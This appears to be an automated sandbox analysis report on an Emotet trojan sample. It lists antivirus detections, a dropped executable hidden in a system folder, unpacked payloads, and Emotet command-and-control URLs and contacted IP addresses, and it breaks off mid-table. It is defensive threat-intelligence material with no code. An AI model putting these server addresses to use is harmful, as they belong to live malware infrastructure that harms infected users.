                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      MV9tCJw8Xr.exe66%VirustotalBrowse
                      MV9tCJw8Xr.exe62%MetadefenderBrowse
                      MV9tCJw8Xr.exe77%ReversingLabsWin32.Trojan.Emotet
                      MV9tCJw8Xr.exe100%AviraHEUR/AGEN.1137653

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe100%Joe Sandbox ML
                      C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe59%MetadefenderBrowse
                      C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe93%ReversingLabsWin32.Trojan.Emotet

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      32.2.jscript9.exe.298052e.3.unpack100%AviraHEUR/AGEN.1110377Download File
                      30.2.msrd2x40.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      22.2.tokenbinding2.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      32.2.jscript9.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.2.KBDHEB.exe.5b053f.2.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                      37.2.catsrvut.exe.2ae279e.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      29.2.KBDINTAM.exe.185279e.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      27.2.COLORCNV.exe.135052e.3.unpack100%AviraHEUR/AGEN.1110377Download File
                      31.2.MCCSEngineShared.exe.28b279e.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      29.2.KBDINTAM.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      30.2.msrd2x40.exe.131052e.2.unpack100%AviraHEUR/AGEN.1110377Download File
                      34.2.wmvdspa.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.2.MV9tCJw8Xr.exe.218053f.2.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                      36.2.msvcr100_clr0400.exe.2670000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      26.2.execmodelproxy.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      28.2.usp10.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      32.2.jscript9.exe.298279e.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      34.2.wmvdspa.exe.31b279e.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      26.2.execmodelproxy.exe.2c7052e.2.unpack100%AviraHEUR/AGEN.1110377Download File
                      31.2.MCCSEngineShared.exe.2970000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      23.2.KBDHEB.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      30.2.msrd2x40.exe.131279e.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.2.MV9tCJw8Xr.exe.2181f3f.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      28.2.usp10.exe.2e3279e.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.2.KBDHEB.exe.21d0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      27.2.COLORCNV.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      23.2.KBDHEB.exe.2b6052e.2.unpack100%AviraHEUR/AGEN.1110377Download File
                      1.2.MV9tCJw8Xr.exe.21e0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      27.2.COLORCNV.exe.135279e.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      34.2.wmvdspa.exe.31b052e.2.unpack100%AviraHEUR/AGEN.1110377Download File
                      26.2.execmodelproxy.exe.2c7279e.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      37.2.catsrvut.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      23.2.KBDHEB.exe.2b6279e.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      36.2.msvcr100_clr0400.exe.25b052e.2.unpack100%AviraHEUR/AGEN.1110377Download File
                      37.2.catsrvut.exe.2ae052e.2.unpack100%AviraHEUR/AGEN.1110377Download File
                      28.2.usp10.exe.2e3052e.2.unpack100%AviraHEUR/AGEN.1110377Download File
                      22.2.tokenbinding2.exe.2eb052e.2.unpack100%AviraHEUR/AGEN.1110377Download File
                      36.2.msvcr100_clr0400.exe.25b279e.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      31.2.MCCSEngineShared.exe.28b052e.2.unpack100%AviraHEUR/AGEN.1110377Download File
                      2.2.KBDHEB.exe.20c4000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      29.2.KBDINTAM.exe.185052e.3.unpack100%AviraHEUR/AGEN.1110377Download File
                      22.2.tokenbinding2.exe.2eb279e.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.2.KBDHEB.exe.5b1f3f.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.2.MV9tCJw8Xr.exe.21c4000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://190.144.18.198/7I6ErDP3TXIbpPVjGt/0%Avira URL Cloudsafe
                      http://87.106.139.101:8080/LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/_o0%Avira URL Cloudsafe
                      http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/0%Avira URL Cloudsafe
                      http://190.144.18.198/7I6ErDP3TXIbpPVjGt/oM0%Avira URL Cloudsafe
                      http://87.106.139.101:8080/bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJj0%Avira URL Cloudsafe
                      http://79.143.178.194:8080/OBOuz0RiXji/d5wQYa4TTiE8mhM/tWmQkXn/eT4anGr2w20EB/5Z2vttar3W/LDWHDNq9fsv20%Avira URL Cloudsafe
                      http://87.106.139.101:8080/LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/0%Avira URL Cloudsafe
                      http://87.106.139.101:8080/bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/0%Avira URL Cloudsafe
                      http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/l0%Avira URL Cloudsafe
                      http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/e0%Avira URL Cloudsafe
                      http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/u0%Avira URL Cloudsafe
                      http://87.10AA0%Avira URL Cloudsafe
                      http://87.10A0%Avira URL Cloudsafe
                      https://dynamic.t0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://87.106.139.101:8080/LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/false
                      • Avira URL Cloud: safe
                      unknown
                      http://87.106.139.101:8080/bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/false
                      • Avira URL Cloud: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://190.144.18.198/7I6ErDP3TXIbpPVjGt/KBDHEB.exe, 00000002.00000002.410251484.0000000002396000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://t0.tiles.ditu.live.com/tiles/gen19svchost.exe, 00000009.00000003.305999257.000001BC4BC41000.00000004.00000001.sdmpfalse
                        high
                        https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000009.00000002.306367566.000001BC4BC3C000.00000004.00000001.sdmpfalse
                          high
                          https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmpfalse
                            high
                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000009.00000002.306367566.000001BC4BC3C000.00000004.00000001.sdmpfalse
                              high
                              http://87.106.139.101:8080/LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/_oKBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://corp.roblox.com/contact/svchost.exe, 00000014.00000003.399566749.000002847D78E000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.399526932.000002847D772000.00000004.00000001.sdmpfalse
                                high
                                https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmpfalse
                                  high
                                  http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmpfalse
                                    high
                                    https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000009.00000003.305999257.000001BC4BC41000.00000004.00000001.sdmpfalse
                                      high
                                      http://190.144.18.198/7I6ErDP3TXIbpPVjGt/oMKBDHEB.exe, 00000002.00000002.410251484.0000000002396000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.hulu.com/ca-privacy-rightssvchost.exe, 00000014.00000003.391438598.000002847D759000.00000004.00000001.sdmpfalse
                                        high
                                        https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmpfalse
                                          high
                                          https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000009.00000003.305925778.000001BC4BC5A000.00000004.00000001.sdmpfalse
                                            high
                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000009.00000003.283903786.000001BC4BC31000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.g5e.com/G5_End_User_License_Supplemental_Termssvchost.exe, 00000014.00000003.392756849.000002847D75D000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392907537.000002847D7BC000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392873654.000002847D77F000.00000004.00000001.sdmpfalse
                                                high
                                                http://87.106.139.101:8080/bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjKBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000009.00000003.305999257.000001BC4BC41000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://79.143.178.194:8080/OBOuz0RiXji/d5wQYa4TTiE8mhM/tWmQkXn/eT4anGr2w20EB/5Z2vttar3W/LDWHDNq9fsv2KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.hulu.com/termssvchost.exe, 00000014.00000003.391438598.000002847D759000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://en.help.roblox.com/hc/en-ussvchost.exe, 00000014.00000003.399566749.000002847D78E000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.399526932.000002847D772000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/lKBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.bingmapsportal.comsvchost.exe, 00000009.00000002.306308761.000001BC4BC13000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000009.00000002.306367566.000001BC4BC3C000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/eKBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://www.hulu.com/do-not-sell-my-infosvchost.exe, 00000014.00000003.391438598.000002847D759000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000009.00000003.305990184.000001BC4BC56000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000009.00000002.306367566.000001BC4BC3C000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://www.roblox.com/developsvchost.exe, 00000014.00000003.399566749.000002847D78E000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.399526932.000002847D772000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/uKBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://instagram.com/hiddencity_svchost.exe, 00000014.00000003.392756849.000002847D75D000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392907537.000002847D7BC000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392873654.000002847D77F000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000009.00000003.283903786.000001BC4BC31000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://corp.roblox.com/parents/svchost.exe, 00000014.00000003.399566749.000002847D78E000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.399526932.000002847D772000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.399513122.000002847D761000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000009.00000002.306367566.000001BC4BC3C000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.306308761.000001BC4BC13000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000009.00000003.305911439.000001BC4BC47000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000009.00000003.283903786.000001BC4BC31000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://87.10AAKBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      low
                                                                                      https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://87.10AKBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        low
                                                                                        http://www.hulu.com/privacysvchost.exe, 00000014.00000003.391438598.000002847D759000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://dynamic.tsvchost.exe, 00000009.00000002.306408621.000001BC4BC62000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000009.00000003.283903786.000001BC4BC31000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://www.roblox.com/info/privacysvchost.exe, 00000014.00000003.399566749.000002847D78E000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.399526932.000002847D772000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://www.g5e.com/termsofservicesvchost.exe, 00000014.00000003.392756849.000002847D75D000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392907537.000002847D7BC000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392873654.000002847D77F000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000009.00000003.305925778.000001BC4BC5A000.00000004.00000001.sdmpfalse
                                                                                                              high

                                                                                                              Contacted IPs

                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs

                                                                                                              Public

                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              126.126.139.26
                                                                                                              unknownJapan17676GIGAINFRASoftbankBBCorpJPtrue
                                                                                                              183.91.3.63
                                                                                                              unknownViet Nam
                                                                                                              45903CMCTELECOM-AS-VNCMCTelecomInfrastructureCompanyVNtrue
                                                                                                              153.204.122.254
                                                                                                              unknownJapan4713OCNNTTCommunicationsCorporationJPtrue
                                                                                                              203.153.216.178
                                                                                                              unknownIndonesia
                                                                                                              45291SURF-IDPTSurfindoNetworkIDtrue
                                                                                                              78.90.78.210
                                                                                                              unknownBulgaria
                                                                                                              35141MEGALANBGtrue
                                                                                                              143.95.101.72
                                                                                                              unknownUnited States
                                                                                                              62729ASMALLORANGE1UStrue
                                                                                                              162.144.145.58
                                                                                                              unknownUnited States
                                                                                                              46606UNIFIEDLAYER-AS-1UStrue
                                                                                                              190.164.135.81
                                                                                                              unknownChile
                                                                                                              22047VTRBANDAANCHASACLtrue
                                                                                                              45.239.204.100
                                                                                                              unknownBrazil
                                                                                                              268405BMOBUENOCOMUNICACOES-MEBRtrue
                                                                                                              190.85.46.52
                                                                                                              unknownColombia
                                                                                                              14080TelmexColombiaSACOtrue
                                                                                                              197.221.227.78
                                                                                                              unknownZimbabwe
                                                                                                              37204TELONEZWtrue
                                                                                                              190.194.12.132
                                                                                                              unknownArgentina
                                                                                                              10481TelecomArgentinaSAARtrue
                                                                                                              181.59.59.54
                                                                                                              unknownColombia
                                                                                                              10620TelmexColombiaSACOtrue
                                                                                                              5.2.246.108
                                                                                                              unknownRomania
                                                                                                              8708RCS-RDS73-75DrStaicoviciROtrue
                                                                                                              103.80.51.61
                                                                                                              unknownThailand
                                                                                                              136023PTE-AS-APPTEGroupCoLtdTHtrue
                                                                                                              87.106.139.101
                                                                                                              unknownGermany
                                                                                                              8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                                                              213.165.178.214
                                                                                                              unknownMalta
                                                                                                              12709MELITACABLEMTtrue
                                                                                                              80.158.35.51
                                                                                                              unknownGermany
                                                                                                              6878AS6878DEtrue
                                                                                                              119.228.75.211
                                                                                                              unknownJapan17511OPTAGEOPTAGEIncJPtrue
                                                                                                              46.105.131.68
                                                                                                              unknownFrance
                                                                                                              16276OVHFRtrue
                                                                                                              192.163.221.191
                                                                                                              unknownUnited States
                                                                                                              46606UNIFIEDLAYER-AS-1UStrue
                                                                                                              190.192.39.136
                                                                                                              unknownArgentina
                                                                                                              10481TelecomArgentinaSAARtrue
                                                                                                              87.106.136.232
                                                                                                              unknownGermany
                                                                                                              8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                                                              80.158.43.136
                                                                                                              unknownGermany
                                                                                                              6878AS6878DEtrue
                                                                                                              80.158.59.174
                                                                                                              unknownGermany
                                                                                                              6878AS6878DEtrue
                                                                                                              157.7.164.178
                                                                                                              unknownJapan7506INTERQGMOInternetIncJPtrue
                                                                                                              60.108.128.186
                                                                                                              unknownJapan17676GIGAINFRASoftbankBBCorpJPtrue
                                                                                                              115.79.59.157
                                                                                                              unknownViet Nam
                                                                                                              7552VIETEL-AS-APViettelGroupVNtrue
                                                                                                              80.158.3.161
                                                                                                              unknownGermany
                                                                                                              6878AS6878DEtrue
                                                                                                              192.241.220.183
                                                                                                              unknownUnited States
                                                                                                              14061DIGITALOCEAN-ASNUStrue
                                                                                                              113.203.238.130
                                                                                                              unknownPakistan
                                                                                                              9387AUGERE-PKAUGERE-PakistanPKtrue
                                                                                                              190.55.186.229
                                                                                                              unknownArgentina
                                                                                                              27747TelecentroSAARtrue
                                                                                                              58.27.215.3
                                                                                                              unknownPakistan
                                                                                                              38264WATEEN-IMS-PK-AS-APNationalWiMAXIMSenvironmentPKtrue
                                                                                                              41.185.29.128
                                                                                                              unknownSouth Africa
                                                                                                              36943GridhostZAtrue
                                                                                                              91.75.75.46
                                                                                                              unknownUnited Arab Emirates
                                                                                                              15802DU-AS1AEtrue
                                                                                                              95.76.142.243
                                                                                                              unknownRomania
                                                                                                              6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingtrue
                                                                                                              190.144.18.198
                                                                                                              unknownColombia
                                                                                                              14080TelmexColombiaSACOfalse
                                                                                                              2.58.16.86
                                                                                                              unknownLatvia
                                                                                                              64421SERTEX-ASLVtrue
                                                                                                              2.82.75.215
                                                                                                              unknownPortugal
                                                                                                              3243MEO-RESIDENCIALPTtrue
                                                                                                              188.166.220.180
                                                                                                              unknownNetherlands
                                                                                                              14061DIGITALOCEAN-ASNUStrue
                                                                                                              115.79.195.246
                                                                                                              unknownViet Nam
                                                                                                              7552VIETEL-AS-APViettelGroupVNtrue
                                                                                                              179.5.118.12
                                                                                                              unknownEl Salvador
                                                                                                              14754TelguaGTtrue
                                                                                                              192.210.217.94
                                                                                                              unknownUnited States
                                                                                                              36352AS-COLOCROSSINGUStrue
                                                                                                              58.94.58.13
                                                                                                              unknownJapan4713OCNNTTCommunicationsCorporationJPtrue
                                                                                                              185.208.226.142
                                                                                                              unknownHungary
                                                                                                              43359TARHELYHUtrue
                                                                                                              41.76.213.144
                                                                                                              unknownSouth Africa
                                                                                                              37611AfrihostZAtrue
                                                                                                              223.17.215.76
                                                                                                              unknownHong Kong
                                                                                                              18116HGC-AS-APHGCGlobalCommunicationsLimitedHKtrue
                                                                                                              75.127.14.170
                                                                                                              unknownUnited States
                                                                                                              36352AS-COLOCROSSINGUStrue
                                                                                                              172.96.190.154
                                                                                                              unknownCanada
                                                                                                              59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                                                                                                              109.206.139.119
                                                                                                              unknownRussian Federation
                                                                                                              47914CDMSRUtrue
                                                                                                              80.158.53.167
                                                                                                              unknownGermany
                                                                                                              6878AS6878DEtrue
                                                                                                              152.32.75.74
                                                                                                              unknownPhilippines
                                                                                                              17639CONVERGE-ASConvergeICTSolutionsIncPHtrue
                                                                                                              103.229.73.17
                                                                                                              unknownIndonesia
                                                                                                              55660MWN-AS-IDPTMasterWebNetworkIDtrue
                                                                                                              80.158.51.209
                                                                                                              unknownGermany
                                                                                                              6878AS6878DEtrue
                                                                                                              178.33.167.120
                                                                                                              unknownFrance
                                                                                                              16276OVHFRtrue
                                                                                                              5.79.70.250
                                                                                                              unknownNetherlands
                                                                                                              60781LEASEWEB-NL-AMS-01NetherlandsNLtrue
                                                                                                              120.51.34.254
                                                                                                              unknownJapan2519VECTANTARTERIANetworksCorporationJPtrue
                                                                                                              85.246.78.192
                                                                                                              unknownPortugal
                                                                                                              3243MEO-RESIDENCIALPTtrue
                                                                                                              117.2.139.117
                                                                                                              unknownViet Nam
                                                                                                              7552VIETEL-AS-APViettelGroupVNtrue
                                                                                                              103.93.220.182
                                                                                                              unknownPhilippines
                                                                                                              17639CONVERGE-ASConvergeICTSolutionsIncPHtrue
                                                                                                              37.205.9.252
                                                                                                              unknownCzech Republic
                                                                                                              24971MASTER-ASCzechRepublicwwwmasterczCZtrue
                                                                                                              172.105.78.244
                                                                                                              unknownUnited States
                                                                                                              63949LINODE-APLinodeLLCUStrue
                                                                                                              37.46.129.215
                                                                                                              unknownRussian Federation
                                                                                                              29182THEFIRST-ASRUtrue
                                                                                                              121.117.147.153
                                                                                                              unknownJapan4713OCNNTTCommunicationsCorporationJPtrue
                                                                                                              110.37.224.243
                                                                                                              unknownPakistan
                                                                                                              38264WATEEN-IMS-PK-AS-APNationalWiMAXIMSenvironmentPKtrue
                                                                                                              180.148.4.130
                                                                                                              unknownViet Nam
                                                                                                              45557VNTT-AS-VNVietnamTechnologyandTelecommunicationJSCVNtrue
                                                                                                              116.202.10.123
                                                                                                              unknownGermany
                                                                                                              24940HETZNER-ASDEtrue
                                                                                                              177.130.51.198
                                                                                                              unknownBrazil
                                                                                                              52747WspServicosdeTelecomunicacoesLtdaBRtrue
                                                                                                              153.229.219.1
                                                                                                              unknownJapan4713OCNNTTCommunicationsCorporationJPtrue
                                                                                                              203.56.191.129
                                                                                                              unknownAustralia
                                                                                                              38220AMAZE-SYD-AS-APwwwamazecomauAUtrue
                                                                                                              189.123.103.233
                                                                                                              unknownBrazil
                                                                                                              28573CLAROSABRtrue
                                                                                                              54.38.143.245
                                                                                                              unknownFrance
                                                                                                              16276OVHFRtrue
                                                                                                              77.74.78.80
                                                                                                              unknownRussian Federation
                                                                                                              31261GARS-ASMoscowRussiaRUtrue
                                                                                                              5.2.164.75
                                                                                                              unknownRomania
                                                                                                              8708RCS-RDS73-75DrStaicoviciROtrue
                                                                                                              190.212.140.6
                                                                                                              unknownNicaragua
                                                                                                              14754TelguaGTtrue
                                                                                                              8.4.9.137
                                                                                                              unknownUnited States
                                                                                                              3356LEVEL3UStrue
                                                                                                              202.29.237.113
                                                                                                              unknownThailand
                                                                                                              4621UNINET-AS-APUNINET-THtrue
                                                                                                              79.133.6.236
                                                                                                              unknownFinland
                                                                                                              3238ALCOMFItrue
                                                                                                              185.80.172.199
                                                                                                              unknownAzerbaijan
                                                                                                              39232UNINETAZtrue
                                                                                                              74.208.173.91
                                                                                                              unknownUnited States
                                                                                                              8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                              188.80.27.54
                                                                                                              unknownPortugal
                                                                                                              3243MEO-RESIDENCIALPTtrue
                                                                                                              139.59.61.215
                                                                                                              unknownSingapore
                                                                                                              14061DIGITALOCEAN-ASNUStrue
                                                                                                              175.103.38.146
                                                                                                              unknownIndonesia
                                                                                                              38320MMS-AS-IDPTMaxindoMitraSolusiIDtrue
                                                                                                              50.116.78.109
                                                                                                              unknownUnited States
                                                                                                              46606UNIFIEDLAYER-AS-1UStrue
                                                                                                              109.13.179.195
                                                                                                              unknownFrance
                                                                                                              15557LDCOMNETFRtrue
                                                                                                              42.200.96.63
                                                                                                              unknownHong Kong
                                                                                                              4760HKTIMS-APHKTLimitedHKtrue
                                                                                                              73.100.19.104
                                                                                                              unknownUnited States
                                                                                                              7922COMCAST-7922UStrue
                                                                                                              109.99.146.210
                                                                                                              unknownRomania
                                                                                                              9050RTDBucharestRomaniaROtrue
                                                                                                              187.193.221.143
                                                                                                              unknownMexico
                                                                                                              8151UninetSAdeCVMXtrue
                                                                                                              80.158.63.78
                                                                                                              unknownGermany
                                                                                                              6878AS6878DEtrue
                                                                                                              198.20.228.9
                                                                                                              unknownUnited States
